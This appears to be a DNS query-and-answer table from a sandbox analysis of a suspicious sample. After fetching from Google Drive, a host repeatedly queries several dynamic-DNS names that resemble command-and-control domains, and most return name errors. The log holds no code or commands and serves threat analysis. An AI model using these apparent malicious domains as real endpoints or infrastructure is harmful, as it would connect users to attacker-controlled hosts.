Nov 30, 2024 21:23:46.896095991 CET	192.168.2.4	1.1.1.1	0xe3c7	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:48.895133972 CET	192.168.2.4	1.1.1.1	0xa730	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:49.894546986 CET	192.168.2.4	1.1.1.1	0x68a8	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:50.933762074 CET	192.168.2.4	1.1.1.1	0x5517	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:51.089996099 CET	192.168.2.4	1.1.1.1	0x2069	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:51.894078016 CET	192.168.2.4	1.1.1.1	0x3d7a	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:53.967255116 CET	192.168.2.4	1.1.1.1	0x1ed6	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:54.894319057 CET	192.168.2.4	1.1.1.1	0x7ef3	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:55.896119118 CET	192.168.2.4	1.1.1.1	0x7764	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:56.039056063 CET	192.168.2.4	1.1.1.1	0x80c5	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:56.894437075 CET	192.168.2.4	1.1.1.1	0x4a66	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:58.894309998 CET	192.168.2.4	1.1.1.1	0xb63	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:59.893861055 CET	192.168.2.4	1.1.1.1	0x4fff	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:24:00.894426107 CET	192.168.2.4	1.1.1.1	0x8570	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:24:01.032838106 CET	192.168.2.4	1.1.1.1	0xca7a	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:24:01.175004959 CET	192.168.2.4	1.1.1.1	0xca7a	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:24:01.894547939 CET	192.168.2.4	1.1.1.1	0x17ab	Standard query (0)	meetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:24:06.316018105 CET	192.168.2.4	1.1.1.1	0x3db	Standard query (0)	freshmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:24:06.455260038 CET	192.168.2.4	1.1.1.1	0xf647	Standard query (0)	freshmysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:24:06.593436956 CET	192.168.2.4	1.1.1.1	0xd476	Standard query (0)	mysweeterbk.ddns.net	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:24:06.733108044 CET	192.168.2.4	1.1.1.1	0xe7e3	Standard query (0)	bbhmeetre1ms.freeddns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 30, 2024 21:19:58.926681995 CET	1.1.1.1	192.168.2.4	0x56e2	No error (0)	drive.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:02.014686108 CET	1.1.1.1	192.168.2.4	0xfb50	No error (0)	drive.usercontent.google.com		142.250.181.33	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:13.919034958 CET	1.1.1.1	192.168.2.4	0xe2ee	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:14.726340055 CET	1.1.1.1	192.168.2.4	0xb7b2	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:14.956677914 CET	1.1.1.1	192.168.2.4	0x953a	No error (0)	myumysmeetr.ddns.net		0.0.0.0	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:15.286494970 CET	1.1.1.1	192.168.2.4	0xd80b	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:18.511601925 CET	1.1.1.1	192.168.2.4	0x4194	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:19.952616930 CET	1.1.1.1	192.168.2.4	0x2d25	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:20.094705105 CET	1.1.1.1	192.168.2.4	0xce21	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:23.318753004 CET	1.1.1.1	192.168.2.4	0xd8c7	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:24.776655912 CET	1.1.1.1	192.168.2.4	0xa4ff	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:26.107414961 CET	1.1.1.1	192.168.2.4	0x57c8	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:29.066092014 CET	1.1.1.1	192.168.2.4	0xc842	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:29.482296944 CET	1.1.1.1	192.168.2.4	0x7bb4	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:31.646773100 CET	1.1.1.1	192.168.2.4	0xaa02	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:34.881442070 CET	1.1.1.1	192.168.2.4	0xe99c	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:35.309427977 CET	1.1.1.1	192.168.2.4	0x4f37	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:36.552264929 CET	1.1.1.1	192.168.2.4	0x83f3	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:39.734575033 CET	1.1.1.1	192.168.2.4	0x266d	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:41.175610065 CET	1.1.1.1	192.168.2.4	0xbe07	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:41.345863104 CET	1.1.1.1	192.168.2.4	0x33a9	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:44.519197941 CET	1.1.1.1	192.168.2.4	0xf94b	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:47.006577969 CET	1.1.1.1	192.168.2.4	0xece2	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:47.149168015 CET	1.1.1.1	192.168.2.4	0x29f0	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:49.314065933 CET	1.1.1.1	192.168.2.4	0x5bed	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:51.751804113 CET	1.1.1.1	192.168.2.4	0x6e47	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:52.914022923 CET	1.1.1.1	192.168.2.4	0x91d2	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:54.063324928 CET	1.1.1.1	192.168.2.4	0x585c	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:56.469964981 CET	1.1.1.1	192.168.2.4	0x5937	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:57.548737049 CET	1.1.1.1	192.168.2.4	0xdc16	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:20:59.485255957 CET	1.1.1.1	192.168.2.4	0x42af	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:01.621457100 CET	1.1.1.1	192.168.2.4	0x5a07	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:02.566562891 CET	1.1.1.1	192.168.2.4	0xfab2	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:04.224761009 CET	1.1.1.1	192.168.2.4	0x64a3	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:06.749284983 CET	1.1.1.1	192.168.2.4	0x3a83	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:07.534893990 CET	1.1.1.1	192.168.2.4	0xf149	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:09.502218962 CET	1.1.1.1	192.168.2.4	0x3e8b	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:11.579838991 CET	1.1.1.1	192.168.2.4	0xb596	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:12.236726999 CET	1.1.1.1	192.168.2.4	0x881	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:14.282865047 CET	1.1.1.1	192.168.2.4	0x5609	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:16.361119986 CET	1.1.1.1	192.168.2.4	0x9ccc	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:17.257592916 CET	1.1.1.1	192.168.2.4	0x9b03	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:19.078742981 CET	1.1.1.1	192.168.2.4	0x254e	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:21.197849989 CET	1.1.1.1	192.168.2.4	0x47a9	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:22.063519955 CET	1.1.1.1	192.168.2.4	0xb4fc	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:24.189595938 CET	1.1.1.1	192.168.2.4	0xa95	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:26.282574892 CET	1.1.1.1	192.168.2.4	0x9de0	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:27.052870035 CET	1.1.1.1	192.168.2.4	0x34e2	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:29.033406019 CET	1.1.1.1	192.168.2.4	0x9b27	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:31.181201935 CET	1.1.1.1	192.168.2.4	0x1ec7	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:32.036652088 CET	1.1.1.1	192.168.2.4	0xfbb6	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:34.034883976 CET	1.1.1.1	192.168.2.4	0x8e56	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:36.175532103 CET	1.1.1.1	192.168.2.4	0xd33b	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:37.039459944 CET	1.1.1.1	192.168.2.4	0xd468	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:39.032274008 CET	1.1.1.1	192.168.2.4	0x7ee4	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:41.169986010 CET	1.1.1.1	192.168.2.4	0x76d0	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:42.039813995 CET	1.1.1.1	192.168.2.4	0x752	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:44.031375885 CET	1.1.1.1	192.168.2.4	0x3a84	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:46.171067953 CET	1.1.1.1	192.168.2.4	0x209	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:47.032495022 CET	1.1.1.1	192.168.2.4	0xed04	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:49.033123970 CET	1.1.1.1	192.168.2.4	0x8b51	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:51.031549931 CET	1.1.1.1	192.168.2.4	0xa315	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:52.032042980 CET	1.1.1.1	192.168.2.4	0x40f6	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:54.042223930 CET	1.1.1.1	192.168.2.4	0x1d59	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:56.313155890 CET	1.1.1.1	192.168.2.4	0x1d43	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:57.032442093 CET	1.1.1.1	192.168.2.4	0xa047	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:21:59.033225060 CET	1.1.1.1	192.168.2.4	0x398e	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:01.173715115 CET	1.1.1.1	192.168.2.4	0x7091	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:02.032789946 CET	1.1.1.1	192.168.2.4	0xa8d	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:04.035186052 CET	1.1.1.1	192.168.2.4	0x2836	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:06.171287060 CET	1.1.1.1	192.168.2.4	0x6b64	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:07.033813000 CET	1.1.1.1	192.168.2.4	0x85bc	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:09.092350960 CET	1.1.1.1	192.168.2.4	0xfb01	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:11.178034067 CET	1.1.1.1	192.168.2.4	0x159d	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:12.046544075 CET	1.1.1.1	192.168.2.4	0x6e51	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:14.033360958 CET	1.1.1.1	192.168.2.4	0x7e0d	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:16.323441029 CET	1.1.1.1	192.168.2.4	0x4949	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:17.033569098 CET	1.1.1.1	192.168.2.4	0xf191	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:19.110893011 CET	1.1.1.1	192.168.2.4	0xf322	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:21.173793077 CET	1.1.1.1	192.168.2.4	0xb927	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:22.032862902 CET	1.1.1.1	192.168.2.4	0x6ba0	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:24.033253908 CET	1.1.1.1	192.168.2.4	0x36e9	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:26.035830021 CET	1.1.1.1	192.168.2.4	0xd564	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:27.033402920 CET	1.1.1.1	192.168.2.4	0xb41c	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:29.032239914 CET	1.1.1.1	192.168.2.4	0x672a	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:31.031441927 CET	1.1.1.1	192.168.2.4	0xb283	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:32.033715963 CET	1.1.1.1	192.168.2.4	0xb226	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:34.040313005 CET	1.1.1.1	192.168.2.4	0x762e	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:36.171250105 CET	1.1.1.1	192.168.2.4	0xb5f4	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:37.031719923 CET	1.1.1.1	192.168.2.4	0xfe1e	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:39.033891916 CET	1.1.1.1	192.168.2.4	0x9951	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:41.346797943 CET	1.1.1.1	192.168.2.4	0x294f	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:42.032397985 CET	1.1.1.1	192.168.2.4	0x6ae2	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:44.311522007 CET	1.1.1.1	192.168.2.4	0xfaab	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:46.170934916 CET	1.1.1.1	192.168.2.4	0xa0e8	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:47.036725998 CET	1.1.1.1	192.168.2.4	0xfccb	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:49.032753944 CET	1.1.1.1	192.168.2.4	0x2538	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:51.171475887 CET	1.1.1.1	192.168.2.4	0x8159	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:51.312465906 CET	1.1.1.1	192.168.2.4	0x8159	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:52.031429052 CET	1.1.1.1	192.168.2.4	0x3a4f	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:54.034245968 CET	1.1.1.1	192.168.2.4	0xb2af	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:56.169811010 CET	1.1.1.1	192.168.2.4	0x3d1c	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:57.032494068 CET	1.1.1.1	192.168.2.4	0xe5f5	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:22:59.129470110 CET	1.1.1.1	192.168.2.4	0xba9d	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:01.176973104 CET	1.1.1.1	192.168.2.4	0xd1a1	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:02.529261112 CET	1.1.1.1	192.168.2.4	0xb5b1	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:04.033869028 CET	1.1.1.1	192.168.2.4	0x85e5	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:06.181725979 CET	1.1.1.1	192.168.2.4	0x64d5	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:07.032265902 CET	1.1.1.1	192.168.2.4	0x833e	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:09.033204079 CET	1.1.1.1	192.168.2.4	0x5bd1	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:11.032233000 CET	1.1.1.1	192.168.2.4	0xb20	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:12.031757116 CET	1.1.1.1	192.168.2.4	0x61f6	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:14.032701015 CET	1.1.1.1	192.168.2.4	0xfbb3	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:16.175368071 CET	1.1.1.1	192.168.2.4	0x2f68	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:16.315465927 CET	1.1.1.1	192.168.2.4	0x2f68	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:17.033974886 CET	1.1.1.1	192.168.2.4	0x577d	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:19.032387972 CET	1.1.1.1	192.168.2.4	0x5ece	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:21.194648981 CET	1.1.1.1	192.168.2.4	0xcfa7	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:22.036382914 CET	1.1.1.1	192.168.2.4	0xdd36	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:24.032818079 CET	1.1.1.1	192.168.2.4	0xcceb	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:26.169893026 CET	1.1.1.1	192.168.2.4	0x371f	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:27.037770987 CET	1.1.1.1	192.168.2.4	0xf41b	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:29.031872988 CET	1.1.1.1	192.168.2.4	0x174a	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:31.462622881 CET	1.1.1.1	192.168.2.4	0x2510	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:32.035029888 CET	1.1.1.1	192.168.2.4	0x2ddf	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:34.055821896 CET	1.1.1.1	192.168.2.4	0x38f1	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:36.179821968 CET	1.1.1.1	192.168.2.4	0xc761	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:37.036088943 CET	1.1.1.1	192.168.2.4	0xcdb8	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:39.033771992 CET	1.1.1.1	192.168.2.4	0xf80f	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:41.172506094 CET	1.1.1.1	192.168.2.4	0x63f7	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:42.032419920 CET	1.1.1.1	192.168.2.4	0xcdb	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:44.032227993 CET	1.1.1.1	192.168.2.4	0x5cb0	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:46.173079014 CET	1.1.1.1	192.168.2.4	0x3b9	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:47.036376953 CET	1.1.1.1	192.168.2.4	0xe3c7	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:49.032840014 CET	1.1.1.1	192.168.2.4	0xa730	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:51.227725029 CET	1.1.1.1	192.168.2.4	0x2069	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:52.033319950 CET	1.1.1.1	192.168.2.4	0x3d7a	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:54.105110884 CET	1.1.1.1	192.168.2.4	0x1ed6	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:56.033998966 CET	1.1.1.1	192.168.2.4	0x7764	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:57.034570932 CET	1.1.1.1	192.168.2.4	0x4a66	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:23:59.035414934 CET	1.1.1.1	192.168.2.4	0xb63	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:24:01.176018953 CET	1.1.1.1	192.168.2.4	0xca7a	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:24:01.315201044 CET	1.1.1.1	192.168.2.4	0xca7a	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:24:02.034182072 CET	1.1.1.1	192.168.2.4	0x17ab	Name error (3)	meetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2024 21:24:06.454674959 CET	1.1.1.1	192.168.2.4	0x3db	Name error (3)	freshmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false
